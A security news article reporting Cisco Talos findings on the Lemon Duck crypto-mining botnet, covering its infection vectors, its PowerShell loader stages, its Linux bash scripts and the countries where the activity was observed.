A crypto-mining botnet known as Lemon Duck has been displaying increased activity since the end of August 2020, researchers from Cisco’s Talos team warned. The botnet, which has been active since December 2018, employs a variety of techniques to spread across a network, such as sending infected RTF files using email, psexec, WMI and SMB exploits, including the EternalBlue and SMBGhost issues that affect Windows 10 machines.
“It is one of the more complex mining botnets with several interesting tricks up its sleeve. Although it has been documented before, we have recently seen a resurgence in the number of DNS requests connected with its command and control and mining servers,” the researchers wrote.
The observed requests originated mainly in Asia, with top five countries being Iran, Egypt, Philippines, Vietnam and India.
The end-goal of the botnet is to steal computer resources to mine Monero cryptocurrency using the XMR cryptominer. To spread across a network the Lemon Duck botnet uses 12 different infection vectors, ranging from standard copying over SMB shares to attempts using vulnerabilities in Redis and the YARN Hadoop resource manager and job scheduler.
The infection starts with a PowerShell loading script, which is copied from other infected systems with SMB, email or external USB drives. After initial infection, a Powershell script is downloaded, which contains a function called 'bpu', which downloads and executes the main PowerShell installer component. It also disables Windows Defender real-time detection and checks if the script is running with admin privileges. If it is, the payload is downloaded and run using the Invoke-Expression cmdlet. If not, it leverages existing system executables to launch the next stage.
“The majority of Lemon Duck functionality is delivered as PowerShell scripts, with multiple levels of loaders which eventually install one or more of cryptocurrency-mining payloads, the main spreading module, the Pyinstaller spreading module or the email-spreading module,” the researchers said.
The research team also provided details of a less known Linux branch of the Yellow Duck malware. Lemon Duck bash scripts are executed after a successful compromise of a Linux host through Redis, YARN or SSH. There are two main bash scripts, one of them collects information about the infected host and attempts to download a Linux version of the XMRig miner, while the second is more complex and is focused on terminating and removing competing cryptocurrency miners already present on the system.
“Lemon Duck is a combination of the code taken from the open-source projects and the code specifically crafted for the botnet. By combining the two, the author shows a moderate level of technical skills and understanding of security issues in Windows and various network protocols. This approach yields code that's more difficult to maintain but the objectives can be achieved very quickly,” the researchers said.